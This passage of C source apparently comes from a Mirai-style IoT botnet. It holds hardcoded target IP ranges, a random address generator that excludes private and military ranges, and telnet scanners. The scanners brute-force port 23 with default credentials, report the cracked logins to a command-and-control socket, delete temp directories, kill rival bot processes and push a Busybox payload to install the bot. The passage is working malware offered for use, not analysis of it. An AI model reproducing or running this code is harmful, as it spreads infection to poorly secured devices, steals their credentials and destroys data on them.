888. szprintf(ip, "87.223.%d.%d", ipState[2], ipState[3]);
889. }
890. if(randnum == 28)
891. {
892. szprintf(ip, "90.94.%d.%d", ipState[2], ipState[3]);
893. }
894. if(randnum == 29)
895. {
896. szprintf(ip, "92.191.%d.%d", ipState[2], ipState[3]);
897. }
898. if(randnum == 30)
899. {
900. szprintf(ip, "95.16.%d.%d", ipState[2], ipState[3]);
901. }
902. if(randnum == 31)
903. {
904. szprintf(ip, "95.17.%d.%d", ipState[2], ipState[3]);
905. }
906. if(randnum == 32)
907. {
908. szprintf(ip, "95.18.%d.%d", ipState[2], ipState[3]);
909. }
910. if(randnum == 33)
911. {
912. szprintf(ip, "95.19.%d.%d", ipState[2], ipState[3]);
913. }
914. if(randnum == 34)
915. {
916. szprintf(ip, "95.20.%d.%d", ipState[2], ipState[3]);
917. }
918. if(randnum == 35)
919. {
920. szprintf(ip, "95.21.%d.%d", ipState[2], ipState[3]);
921. }
922. if(randnum == 36)
923. {
924. szprintf(ip, "95.22.%d.%d", ipState[2], ipState[3]);
925. }
926. if(randnum == 37)
927. {
928. szprintf(ip, "95.23.%d.%d", ipState[2], ipState[3]);
929. }
930. return inet_addr(ip);
931. }
932. in_addr_t PhoneScan(){
933. ipState[0] = 0;
934. ipState[1] = 0;
935. ipState[2] = 0;
936. ipState[3] = 0;
937. ipState[0] = rand() % 255;
938. ipState[1] = rand() % 255;
939. ipState[2] = rand() % 255;
940. ipState[3] = rand() % 255;
941. int randnum = rand() % 117;
942. char ip[16];
943. if(randnum == 0)
944. {
945. szprintf(ip, "119.157.%d.%d", ipState[2], ipState[3]);
946. }
947. if(randnum == 1)
948. {
949. szprintf(ip, "119.150.%d.%d", ipState[2], ipState[3]);
950. }
951. if(randnum == 2)
952. {
953. szprintf(ip, "119.151.%d.%d", ipState[2], ipState[3]);
954. }
955. if(randnum == 3)
956. {
957. szprintf(ip, "119.152.%d.%d", ipState[2], ipState[3]);
958. }
959. if(randnum == 4)
960. {
961. szprintf(ip, "119.153.%d.%d", ipState[2], ipState[3]);
962. }
963. if(randnum == 5)
964. {
965. szprintf(ip, "119.154.%d.%d", ipState[2], ipState[3]);
966. }
967. if(randnum == 6)
968. {
969. szprintf(ip, "119.155.%d.%d", ipState[2], ipState[3]);
970. }
971. if(randnum == 7)
972. {
973. szprintf(ip, "119.156.%d.%d", ipState[2], ipState[3]);
974. }
975. if(randnum == 8)
976. {
977. szprintf(ip, "119.157.%d.%d", ipState[2], ipState[3]);
978. }
979. if(randnum == 9)
980. {
981. szprintf(ip, "119.158.%d.%d", ipState[2], ipState[3]);
982. }
983. if(randnum == 10)
984. {
985. szprintf(ip, "119.159.%d.%d", ipState[2], ipState[3]);
986. }
987. if(randnum == 11)
988. {
989. szprintf(ip, "191.24.%d.%d", ipState[2], ipState[3]);
990. }
991. if(randnum == 12)
992. {
993. szprintf(ip, "187.119.%d.%d", ipState[2], ipState[3]);
994. }
995. if(randnum == 13)
996. {
997. szprintf(ip, "177.215.%d.%d", ipState[2], ipState[3]);
998. }
999. if(randnum == 14)
1000. {
1001. szprintf(ip, "152.241.%d.%d", ipState[2], ipState[3]);
1002. }
1003. if(randnum == 15)
1004. {
1005. szprintf(ip, "182.185.%d.%d", ipState[2], ipState[3]);
1006. }
1007. if(randnum == 16)
1008. {
1009. szprintf(ip, "179.80.%d.%d", ipState[2], ipState[3]);
1010. }
1011. if(randnum == 17)
1012. {
1013. szprintf(ip, "179.81.%d.%d", ipState[2], ipState[3]);
1014. }
1015. if(randnum == 18)
1016. {
1017. szprintf(ip, "179.82.%d.%d", ipState[2], ipState[3]);
1018. }
1019. if(randnum == 19)
1020. {
1021. szprintf(ip, "179.83.%d.%d", ipState[2], ipState[3]);
1022. }
1023. if(randnum == 20)
1024. {
1025. szprintf(ip, "179.84.%d.%d", ipState[2], ipState[3]);
1026. }
1027. if(randnum == 21)
1028. {
1029. szprintf(ip, "179.86.%d.%d", ipState[2], ipState[3]);
1030. }
1031. if(randnum == 22)
1032. {
1033. szprintf(ip, "179.87.%d.%d", ipState[2], ipState[3]);
1034. }
1035. if(randnum == 23)
1036. {
1037. szprintf(ip, "179.88.%d.%d", ipState[2], ipState[3]);
1038. }
1039. if(randnum == 24)
1040. {
1041. szprintf(ip, "179.89.%d.%d", ipState[2], ipState[3]);
1042. }
1043. if(randnum == 25)
1044. {
1045. szprintf(ip, "179.90.%d.%d", ipState[2], ipState[3]);
1046. }
1047. if(randnum == 26)
1048. {
1049. szprintf(ip, "179.91.%d.%d", ipState[2], ipState[3]);
1050. }
1051. if(randnum == 27)
1052. {
1053. szprintf(ip, "179.92.%d.%d", ipState[2], ipState[3]);
1054. }
1055. if(randnum == 28)
1056. {
1057. szprintf(ip, "179.93.%d.%d", ipState[2], ipState[3]);
1058. }
1059. if(randnum == 29)
1060. {
1061. szprintf(ip, "179.94.%d.%d", ipState[2], ipState[3]);
1062. }
1063. if(randnum == 30)
1064. {
1065. szprintf(ip, "179.95.%d.%d", ipState[2], ipState[3]);
1066. }
1067. if(randnum == 31)
1068. {
1069. szprintf(ip, "179.96.%d.%d", ipState[2], ipState[3]);
1070. }
1071. if(randnum == 32)
1072. {
1073. szprintf(ip, "179.97.%d.%d", ipState[2], ipState[3]);
1074. }
1075. if(randnum == 33)
1076. {
1077. szprintf(ip, "179.98.%d.%d", ipState[2], ipState[3]);
1078. }
1079. if(randnum == 34)
1080. {
1081. szprintf(ip, "179.99.%d.%d", ipState[2], ipState[3]);
1082. }
1083. if(randnum == 35)
1084. {
1085. szprintf(ip, "152.240.%d.%d", ipState[2], ipState[3]);
1086. }
1087. if(randnum == 36)
1088. {
1089. szprintf(ip, "152.241.%d.%d", ipState[2], ipState[3]);
1090. }
1091. if(randnum == 37)
1092. {
1093. szprintf(ip, "152.242.%d.%d", ipState[2], ipState[3]);
1094. }
1095. if(randnum == 38)
1096. {
1097. szprintf(ip, "152.243.%d.%d", ipState[2], ipState[3]);
1098. }
1099. if(randnum == 39)
1100. {
1101. szprintf(ip, "152.244.%d.%d", ipState[2], ipState[3]);
1102. }
1103. if(randnum == 40)
1104. {
1105. szprintf(ip, "152.245.%d.%d", ipState[2], ipState[3]);
1106. }
1107. if(randnum == 41)
1108. {
1109. szprintf(ip, "152.246.%d.%d", ipState[2], ipState[3]);
1110. }
1111. if(randnum == 42)
1112. {
1113. szprintf(ip, "152.247.%d.%d", ipState[2], ipState[3]);
1114. }
1115. if(randnum == 43)
1116. {
1117. szprintf(ip, "152.248.%d.%d", ipState[2], ipState[3]);
1118. }
1119. if(randnum == 44)
1120. {
1121. szprintf(ip, "152.249.%d.%d", ipState[2], ipState[3]);
1122. }
1123. if(randnum == 45)
1124. {
1125. szprintf(ip, "182.189.%d.%d", ipState[2], ipState[3]);
1126. }
1127. if(randnum == 46)
1128. {
1129. szprintf(ip, "182.190.%d.%d", ipState[2], ipState[3]);
1130. }
1131. if(randnum == 47)
1132. {
1133. szprintf(ip, "182.191.%d.%d", ipState[2], ipState[3]);
1134. }
1135. if(randnum == 48)
1136. {
1137. szprintf(ip, "182.188.%d.%d", ipState[2], ipState[3]);
1138. }
1139. if(randnum == 49)
1140. {
1141. szprintf(ip, "182.187.%d.%d", ipState[2], ipState[3]);
1142. }
1143. if(randnum == 50)
1144. {
1145. szprintf(ip, "182.186.%d.%d", ipState[2], ipState[3]);
1146. }
1147. if(randnum == 51)
1148. {
1149. szprintf(ip, "182.185.%d.%d", ipState[2], ipState[3]);
1150. }
1151. if(randnum == 52)
1152. {
1153. szprintf(ip, "182.184.%d.%d", ipState[2], ipState[3]);
1154. }
1155. if(randnum == 53)
1156. {
1157. szprintf(ip, "179.100.%d.%d", ipState[2], ipState[3]);
1158. }
1159. if(randnum == 54)
1160. {
1161. szprintf(ip, "179.101.%d.%d", ipState[2], ipState[3]);
1162. }
1163. if(randnum == 55)
1164. {
1165. szprintf(ip, "179.102.%d.%d", ipState[2], ipState[3]);
1166. }
1167. if(randnum == 56)
1168. {
1169. szprintf(ip, "179.103.%d.%d", ipState[2], ipState[3]);
1170. }
1171. if(randnum == 57)
1172. {
1173. szprintf(ip, "179.110.%d.%d", ipState[2], ipState[3]);
1174. }
1175. if(randnum == 58)
1176. {
1177. szprintf(ip, "179.111.%d.%d", ipState[2], ipState[3]);
1178. }
1179. if(randnum == 59)
1180. {
1181. szprintf(ip, "179.112.%d.%d", ipState[2], ipState[3]);
1182. }
1183. if(randnum == 60)
1184. {
1185. szprintf(ip, "179.113.%d.%d", ipState[2], ipState[3]);
1186. }
1187. if(randnum == 61)
1188. {
1189. szprintf(ip, "179.114.%d.%d", ipState[2], ipState[3]);
1190. }
1191. if(randnum == 62)
1192. {
1193. szprintf(ip, "179.115.%d.%d", ipState[2], ipState[3]);
1194. }
1195. if(randnum == 63)
1196. {
1197. szprintf(ip, "179.116.%d.%d", ipState[2], ipState[3]);
1198. }
1199. if(randnum == 64)
1200. {
1201. szprintf(ip, "179.117.%d.%d", ipState[2], ipState[3]);
1202. }
1203. if(randnum == 65)
1204. {
1205. szprintf(ip, "191.193.%d.%d", ipState[2], ipState[3]);
1206. }
1207. if(randnum == 66)
1208. {
1209. szprintf(ip, "191.194.%d.%d", ipState[2], ipState[3]);
1210. }
1211. if(randnum == 67)
1212. {
1213. szprintf(ip, "191.195.%d.%d", ipState[2], ipState[3]);
1214. }
1215. if(randnum == 68)
1216. {
1217. szprintf(ip, "191.196.%d.%d", ipState[2], ipState[3]);
1218. }
1219. if(randnum == 69)
1220. {
1221. szprintf(ip, "191.197.%d.%d", ipState[2], ipState[3]);
1222. }
1223. if(randnum == 70)
1224. {
1225. szprintf(ip, "191.198.%d.%d", ipState[2], ipState[3]);
1226. }
1227. if(randnum == 71)
1228. {
1229. szprintf(ip, "152.250.%d.%d", ipState[2], ipState[3]);
1230. }
1231. if(randnum == 72)
1232. {
1233. szprintf(ip, "152.251.%d.%d", ipState[2], ipState[3]);
1234. }
1235. if(randnum == 73)
1236. {
1237. szprintf(ip, "152.252.%d.%d", ipState[2], ipState[3]);
1238. }
1239. if(randnum == 74)
1240. {
1241. szprintf(ip, "152.253.%d.%d", ipState[2], ipState[3]);
1242. }
1243. if(randnum == 75)
1244. {
1245. szprintf(ip, "152.254.%d.%d", ipState[2], ipState[3]);
1246. }
1247. if(randnum == 76)
1248. {
1249. szprintf(ip, "152.255.%d.%d", ipState[2], ipState[3]);
1250. }
1251. if(randnum == 77)
1252. {
1253. szprintf(ip, "177.112.%d.%d", ipState[2], ipState[3]);
1254. }
1255. if(randnum == 78)
1256. {
1257. szprintf(ip, "177.113.%d.%d", ipState[2], ipState[3]);
1258. }
1259. if(randnum == 79)
1260. {
1261. szprintf(ip, "177.114.%d.%d", ipState[2], ipState[3]);
1262. }
1263. if(randnum == 80)
1264. {
1265. szprintf(ip, "177.115.%d.%d", ipState[2], ipState[3]);
1266. }
1267. if(randnum == 81)
1268. {
1269. szprintf(ip, "177.116.%d.%d", ipState[2], ipState[3]);
1270. }
1271. if(randnum == 82)
1272. {
1273. szprintf(ip, "177.117.%d.%d", ipState[2], ipState[3]);
1274. }
1275. if(randnum == 83)
1276. {
1277. szprintf(ip, "177.118.%d.%d", ipState[2], ipState[3]);
1278. }
1279. if(randnum == 84)
1280. {
1281. szprintf(ip, "177.119.%d.%d", ipState[2], ipState[3]);
1282. }
1283. if(randnum == 85)
1284. {
1285. szprintf(ip, "177.120.%d.%d", ipState[2], ipState[3]);
1286. }
1287. if(randnum == 86)
1288. {
1289. szprintf(ip, "177.121.%d.%d", ipState[2], ipState[3]);
1290. }
1291. if(randnum == 87)
1292. {
1293. szprintf(ip, "177.138.%d.%d", ipState[2], ipState[3]);
1294. }
1295. if(randnum == 88)
1296. {
1297. szprintf(ip, "177.139.%d.%d", ipState[2], ipState[3]);
1298. }
1299. if(randnum == 89)
1300. {
1301. szprintf(ip, "177.144.%d.%d", ipState[2], ipState[3]);
1302. }
1303. if(randnum == 90)
1304. {
1305. szprintf(ip, "177.145.%d.%d", ipState[2], ipState[3]);
1306. }
1307. if(randnum == 91)
1308. {
1309. szprintf(ip, "177.146.%d.%d", ipState[2], ipState[3]);
1310. }
1311. if(randnum == 92)
1312. {
1313. szprintf(ip, "177.147.%d.%d", ipState[2], ipState[3]);
1314. }
1315. if(randnum == 93)
1316. {
1317. szprintf(ip, "177.160.%d.%d", ipState[2], ipState[3]);
1318. }
1319. if(randnum == 94)
1320. {
1321. szprintf(ip, "177.161.%d.%d", ipState[2], ipState[3]);
1322. }
1323. if(randnum == 95)
1324. {
1325. szprintf(ip, "177.162.%d.%d", ipState[2], ipState[3]);
1326. }
1327. if(randnum == 96)
1328. {
1329. szprintf(ip, "177.163.%d.%d", ipState[2], ipState[3]);
1330. }
1331. if(randnum == 97)
1332. {
1333. szprintf(ip, "177.168.%d.%d", ipState[2], ipState[3]);
1334. }
1335. if(randnum == 98)
1336. {
1337. szprintf(ip, "177.169.%d.%d", ipState[2], ipState[3]);
1338. }
1339. if(randnum == 99)
1340. {
1341. szprintf(ip, "177.170.%d.%d", ipState[2], ipState[3]);
1342. }
1343. if(randnum == 100)
1344. {
1345. szprintf(ip, "177.171.%d.%d", ipState[2], ipState[3]);
1346. }
1347. if(randnum == 101)
1348. {
1349. szprintf(ip, "177.172.%d.%d", ipState[2], ipState[3]);
1350. }
1351. if(randnum == 102)
1352. {
1353. szprintf(ip, "189.96.%d.%d", ipState[2], ipState[3]);
1354. }
1355. if(randnum == 103)
1356. {
1357. szprintf(ip, "189.97.%d.%d", ipState[2], ipState[3]);
1358. }
1359. if(randnum == 104)
1360. {
1361. szprintf(ip, "189.98.%d.%d", ipState[2], ipState[3]);
1362. }
1363. if(randnum == 105)
1364. {
1365. szprintf(ip, "189.99.%d.%d", ipState[2], ipState[3]);
1366. }
1367. if(randnum == 106)
1368. {
1369. szprintf(ip, "39.34.%d.%d", ipState[2], ipState[3]);
1370. }
1371. if(randnum == 107)
1372. {
1373. szprintf(ip, "59.103.%d.%d", ipState[2], ipState[3]);
1374. }
1375. if(randnum == 108)
1376. {
1377. szprintf(ip, "191.12.%d.%d", ipState[2], ipState[3]);
1378. }
1379. if(randnum == 109)
1380. {
1381. szprintf(ip, "186.117.%d.%d", ipState[2], ipState[3]);
1382. }
1383. if(randnum == 110)
1384. {
1385. szprintf(ip, "179.131.%d.%d", ipState[2], ipState[3]);
1386. }
1387. if(randnum == 111)
1388. {
1389. szprintf(ip, "179.129.%d.%d", ipState[2], ipState[3]);
1390. }
1391. if(randnum == 112)
1392. {
1393. szprintf(ip, "179.170.%d.%d", ipState[2], ipState[3]);
1394. }
1395. if(randnum == 113)
1396. {
1397. szprintf(ip, "191.206.%d.%d", ipState[2], ipState[3]);
1398. }
1399. if(randnum == 114)
1400. {
1401. szprintf(ip, "187.118.%d.%d", ipState[2], ipState[3]);
1402. }
1403. if(randnum == 115)
1404. {
1405. szprintf(ip, "187.116.%d.%d", ipState[2], ipState[3]);
1406. }
1407. if(randnum == 116)
1408. {
1409. szprintf(ip, "179.224.%d.%d", ipState[2], ipState[3]);
1410. }
1411. if(randnum == 117)
1412. {
1413. szprintf(ip, "179.166.%d.%d", ipState[2], ipState[3]);
1414. }
1415. return inet_addr(ip);
1416. }
1417. static ipv4_t MiraiIPRanges(void)
1418. {
1419.     uint32_t tmp;
1420.     uint8_t o1, o2, o3, o4;
1421.     do
1422.     {
1423.         tmp = rand_cmwc();
1424.         o1 = tmp & 0xff;
1425.         o2 = (tmp >> 8) & 0xff;
1426.         o3 = (tmp >> 16) & 0xff;
1427.         o4 = (tmp >> 24) & 0xff;
1428.     }
1429.     while (o1 == 127 ||                             // 127.0.0.0/8      - Loopback
1430.           (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space
1431.           (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company
1432.           (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company
1433.           (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service
1434.           (o1 == 10) ||                             // 10.0.0.0/8       - Internal network
1435.           (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network
1436.           (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network
1437.           (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved
1438.           (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved
1439.           (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use
1440.           (o1 >= 224) ||                            // 224.*.*.*+       - Multicast
1441.           (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
1442.     );
1443. char ip[16];
1444. szprintf(ip, "%d.%d.%d.%d", o1,  o2, o3, o4);
1445. return INET_ADDR(o1,o2,o3,o4);
1446. }
1447. int rangechoice = 1;
1448. in_addr_t findARandomIP()
1449. {
1450. if(rangechoice < 1 || rangechoice > 2)
1451. {
1452. return getRandomPublicIP();
1453. }
1454. else
1455. {
1456. if(rangechoice == 1){
1457. return getRandomPublicIP();
1458. }
1459. else if(rangechoice == 2)
1460. {
1461. return getRandomPublicIP();
1462. }
1463. else
1464. {
1465. return getRandomPublicIP();
1466. }
1467. }
1468. }
1469. in_addr_t getRandomIP(in_addr_t netmask) {
1470.         in_addr_t tmp = ntohl(ourIP.s_addr) & netmask;
1471.         return tmp ^ ( rand_cmwc() & ~netmask);
1472. }
1473. unsigned short csum (unsigned short *buf, int count) {
1474.         register uint64_t sum = 0;
1475.         while( count > 1 ) { sum += *buf++; count -= 2; }
1476.         if(count > 0) { sum += *(unsigned char *)buf; }
1477.         while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
1478.         return (uint16_t)(~sum);
1479. }
1480. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
1481.         struct tcp_pseudo {
1482.                 unsigned long src_addr;
1483.                 unsigned long dst_addr;
1484.                 unsigned char zero;
1485.                 unsigned char proto;
1486.                 unsigned short length;
1487.         } pseudohead;
1488.         unsigned short total_len = iph->tot_len;
1489.         pseudohead.src_addr=iph->saddr;
1490.         pseudohead.dst_addr=iph->daddr;
1491.         pseudohead.zero=0;
1492.         pseudohead.proto=IPPROTO_TCP;
1493.         pseudohead.length=htons(sizeof(struct tcphdr));
1494.         int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
1495.         unsigned short *tcp = malloc(totaltcp_len);
1496.         memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
1497.         memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
1498.         unsigned short output = csum(tcp,totaltcp_len);
1499.         free(tcp);
1500.         return output;
1501. }
1502. void makeIPPacket(struct iphdr *iph, uint32_t dest, uint32_t source, uint8_t protocol, int packetSize) {
1503.         iph->ihl = 5;
1504.         iph->version = 4;
1505.         iph->tos = 0;
1506.         iph->tot_len = sizeof(struct iphdr) + packetSize;
1507.         iph->id = rand_cmwc();
1508.         iph->frag_off = 0;
1509.         iph->ttl = MAXTTL;
1510.         iph->protocol = protocol;
1511.         iph->check = 0;
1512.         iph->saddr = source;
1513.         iph->daddr = dest;
1514. }
1515. int sclose(int fd) {
1516.         if(3 > fd) return 1;
1517.         close(fd);
1518.         return 0;
1519. }
1520. void BCMscanner() {
1521. int maxfds = 312, i, res, j, valopt;
1522. int max = maxfds;
1523. char buf[128], cur_dir;
1524. fd_set fdset;
1525. struct timeval tv;
1526. socklen_t lon;
1527. srand(time(NULL) ^ rand_cmwc());
1528. char line[256];
1529. char* buffer;
1530. struct sockaddr_in dest_addr;
1531. dest_addr.sin_family = AF_INET;
1532. dest_addr.sin_port = htons(23);
1533. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1534. buffer = malloc(312 + 1);
1535. memset(buffer, 0, 312 + 1);
1536. struct telstate_t fds[max];
1537. memset(fds, 0, max * (sizeof(int) + 1));
1538. for(i = 0; i < max; i++) {
1539. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1540. fds[i].complete = 1;
1541. fds[i].sockbuf = buffer; }
1542. while(1) {
1543. for(i = 0; i < max; i++) {
1544. if(fds[i].tTimeout == 0) {
1545. fds[i].tTimeout = time(NULL); }
1546. switch(fds[i].state) {
1547. case 0: {
1548. if(fds[i].complete == 1) {
1549. char *tmp = fds[i].sockbuf;
1550. memset(&(fds[i]), 0, sizeof(struct telstate_t));
1551. fds[i].sockbuf = tmp;
1552. fds[i].ip = BCMSCAN(); }
1553. dest_addr.sin_family = AF_INET;
1554. dest_addr.sin_port = htons(23);
1555. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1556. dest_addr.sin_addr.s_addr = fds[i].ip;
1557. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1558. if(fds[i].fd == -1) continue;
1559. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1560. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS) {
1561. sclose(fds[i].fd);
1562. fds[i].complete = 1; }
1563. else {
1564. fds[i].state = 1;
1565. fds[i].tTimeout = 0;
1566. }
1567. }
1568. break;
1569. case 1: {
1570. FD_ZERO(&fdset);
1571. FD_SET(fds[i].fd, &fdset);
1572. tv.tv_sec = 0;
1573. tv.tv_usec = 10000;
1574. res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
1575. if(res == 1) {
1576. lon = sizeof(int);
1577. valopt = 0;
1578. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1579. if(valopt) {
1580. sclose(fds[i].fd);
1581. fds[i].state = 0;
1582. fds[i].complete = 1;
1583. } else {
1584. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) & (~O_NONBLOCK));
1585. fds[i].tTimeout = 0;
1586. fds[i].bufUsed = 0;
1587. memset(fds[i].sockbuf, 0, 312);
1588. fds[i].state = 2;
1589. } continue; }
1590. else if(res == -1) {
1591. sclose(fds[i].fd);
1592. fds[i].state = 0;
1593. fds[i].complete = 1;
1594. continue; }
1595. if(fds[i].tTimeout + 6 < time(NULL)) {
1596. sclose(fds[i].fd);
1597. fds[i].state = 0;
1598. fds[i].complete = 1;
1599. }
1600. }
1601. break;
1602. case 2: {
1603. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, phone)) {
1604. if(contains_fail(fds[i].sockbuf)) {
1605. fds[i].state = 0;
1606. } else {
1607. fds[i].state = 3; }
1608. continue; }
1609. if(fds[i].tTimeout + 6 < time(NULL)) {
1610. fds[i].state = 0;
1611. fds[i].complete = 1;
1612. }
1613. }
1614. break;
1615. case 3: {
1616. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
1617. fds[i].state = 0;
1618. fds[i].complete = 1;
1619. continue; }
1620. fds[i].state = 4;
1621. }
1622. break;
1623. case 4: {
1624. if(read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, phone)) {
1625. if(contains_fail(fds[i].sockbuf)) {
1626. fds[i].state = 0;
1627. } else {
1628. fds[i].state = 5; }
1629. continue; }
1630. if(fds[i].tTimeout + 6 < time(NULL)) {
1631. fds[i].state = 0;
1632. fds[i].complete = 1;
1633. }
1634. }
1635. break;
1636. case 5: {
1637. if(send(fds[i].fd, "admin\r\n", 7, MSG_NOSIGNAL) < 0) {
1638. fds[i].state = 0;
1639. fds[i].complete = 1;
1640. continue; }
1641. fds[i].state = 6; }
1642. break;
1643. case 6: {
1644. if (read_until_response(fds[i].fd, 10000, fds[i].sockbuf, 312, advances2)) {
1645. fds[i].tTimeout = time(NULL);
1646. if (contains_fail(fds[i].sockbuf)) {
1647. fds[i].state = 0;
1648. } else {
1649. sockprintf(mainCommSock, "[ BCM ] Successfully Bruted. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1650.                                 sockprintf(mainCommSock, "REPORT %s:%s:%s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1651.                                 fds[i].state = 7;
1652. } continue; }
1653. if (fds[i].tTimeout + 7 < time(NULL)) {
1654. fds[i].state = 0;
1655. fds[i].complete = 1;
1656. }
1657. }
1658. break;
1659. case 7: {
1660.     char RemoveTheTempDirs [80];
1661.                 sprintf(RemoveTheTempDirs, "rm -rf %s;", Temp_Directorys);
1662.                 if(send(fds[i].fd, RemoveTheTempDirs, strlen(RemoveTheTempDirs), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1663.                 RemoveTempDirs();
1664.                 sockprintf(mainCommSock, "[ BCM ] Removing Temp Directorys. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1665.                 char killtheproccesses[80];
1666.                 sprintf(killtheproccesses, "pkill -9 %s;killall -9 %s;", Bot_Killer_Binarys, Bot_Killer_Binarys);
1667.                 if(send(fds[i].fd, killtheproccesses, strlen(killtheproccesses), MSG_NOSIGNAL) < 0) { reset_telstate(&fds[i]);continue; }
1668.                 sockprintf(mainCommSock, "[ BCM ] Bot Killing. || IP: %s || Port: 23 || Username: %s || Password: %s", get_telstate_host(&fds[i]), Telnet_Usernames[fds[i].usernameInd], Telnet_Passwords[fds[i].passwordInd]);
1669.                
1670. fds[i].tTimeout = time(NULL);
1671. if(send(fds[i].fd, Busybox_Payload, strlen(Busybox_Payload), MSG_NOSIGNAL) < 0) {
1672. sclose(fds[i].fd);
1673. fds[i].state = 0;
1674. fds[i].complete = 1;
1675. continue; }
1676. fds[i].complete = 3;
1677. if(fds[i].tTimeout + 60 < time(NULL)) {
1678. if(fds[i].complete !=3){
1679. }
1680. fds[i].state = 0;
1681. fds[i].complete = 1;
1682. }
1683. break;
1684. }
1685. }
1686. }
1687. }
1688. }
1689. void TelnetScanner(int wait_usec, int maxfds){
1690.         int max = getdtablesize() - 100, i, res, num_tmps, j;
1691.         char buf[128], cur_dir;
1692.         if (max > maxfds)
1693.                 max = maxfds;
1694.         fd_set fdset;
1695.         struct timeval tv;
1696.         socklen_t lon;
1697.         int valopt;
1698.         char line[256];
1699.         char* buffer;
1700.         struct sockaddr_in dest_addr;
1701.         dest_addr.sin_family = AF_INET;
1702.         dest_addr.sin_port = htons(23);
1703.         memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1704.         buffer = malloc(SOCKBUF_SIZE + 1);
1705.         memset(buffer, 0, SOCKBUF_SIZE + 1);
1706.         struct telstate_t fds[max];
1707.         memset(fds, 0, max * (sizeof(int) + 1));
1708.         for(i = 0; i < max; i++)
1709.         {
1710.             memset(&(fds[i]), 0, sizeof(struct telstate_t));
1711.             fds[i].complete = 1;
1712.             fds[i].sockbuf = buffer;
1713.         }
1714.         while(1) {
1715.                 for(i = 0; i < max; i++) {
1716.                         if(fds[i].tTimeout == 0) {
1717.                                 fds[i].tTimeout = time(NULL);
1718.                         }
1719.                         switch(fds[i].state) {
1720.             case 0:
1721.                 {
1722.                     if(fds[i].complete == 1)
1723.                     {
1724.                         char *tmp = fds[i].sockbuf;
1725.                         memset(&(fds[i]), 0, sizeof(struct telstate_t));
1726.                         fds[i].sockbuf = tmp;
1727.                         fds[i].ip = findARandomIP();
1728.                     }
1729.                     else if(fds[i].complete == 0)
1730.                     {
1731.                         fds[i].usernameInd++;
1732.                         fds[i].passwordInd++;
1733.                         if(fds[i].passwordInd == sizeof(Telnet_Passwords) / sizeof(char *))
1734.                         {
1735.                             fds[i].complete = 1;
1736.                             continue;
1737.                         }
1738.                         if(fds[i].usernameInd == sizeof(Telnet_Usernames) / sizeof(char *))
1739.                         {
1740.                             fds[i].complete = 1;
1741.                             continue;
1742.                         }
1743.                     }
1744.                     dest_addr.sin_family = AF_INET;
1745.                     dest_addr.sin_port = htons(23);
1746.                     memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1747.                     dest_addr.sin_addr.s_addr = fds[i].ip;
1748.                     fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1749.                     if(fds[i].fd == -1) continue;
1750.                     fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1751.                     if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1 && errno != EINPROGRESS)
1752.                     {
1753.                         reset_telstate(&fds[i]);
1754.                     }
1755.                     else
1756.                     {
1757.                         advance_telstate(&fds[i], 1);
1758.                     }
1759.                 }
1760.                 break;
1761.             case 1:
1762.                 {
1763.                     FD_ZERO(&fdset);
1764.                     FD_SET(fds[i].fd, &fdset);
1765.                     tv.tv_sec = 0;
1766.                     tv.tv_usec = wait_usec;
1767.                     res = select(fds[i].fd+1, NULL, &fdset, NULL, &tv);
1768.                     if(res == 1) {
1769.                         fds[i].tTimeout = 0;
1770.                         lon = sizeof(int);
1771.                         valopt = 0;
1772.                         getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1773.                         if(valopt)
1774.                         {
1775.                             reset_telstate(&fds[i]);
1776.                         }
1777.                         else
1778.                         {
